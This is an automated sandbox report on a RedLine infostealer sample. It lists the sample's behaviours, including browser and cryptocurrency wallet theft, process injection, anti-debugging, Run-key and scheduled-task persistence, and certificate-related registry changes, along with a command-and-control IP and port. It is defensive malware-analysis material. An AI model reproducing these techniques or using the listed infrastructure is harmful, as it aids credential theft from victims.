Malware Analysis Report

2025-01-18 09:27

Sample ID 230811-afy6lahf98
Target 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp
SHA256 e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607
Tags
logsdiller cloud (tg: @logsdillabot) redline infostealer spyware stealer evasion persistence themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607

Threat Level: Known bad

The file 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline infostealer spyware stealer evasion persistence themida

Redline family

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

Themida packer

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-11 00:09

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-11 00:09

Reported

2023-08-11 00:12

Platform

win7-20230712-en

Max time kernel

122s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

Signatures

RedLine

infostealer redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp

Files

memory/1976-54-0x0000000000E90000-0x0000000000EC4000-memory.dmp

memory/1976-55-0x0000000074200000-0x00000000748EE000-memory.dmp

memory/1976-56-0x00000000003B0000-0x00000000003B6000-memory.dmp

memory/1976-57-0x00000000047B0000-0x00000000047F0000-memory.dmp

memory/1976-58-0x0000000074200000-0x00000000748EE000-memory.dmp

memory/1976-59-0x0000000074200000-0x00000000748EE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-11 00:09

Reported

2023-08-11 00:12

Platform

win10v2004-20230703-en

Max time kernel

150s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3816 set thread context of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1508 set thread context of 4912 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1508 set thread context of 2208 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1484 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1484 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1484 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4200 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4200 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
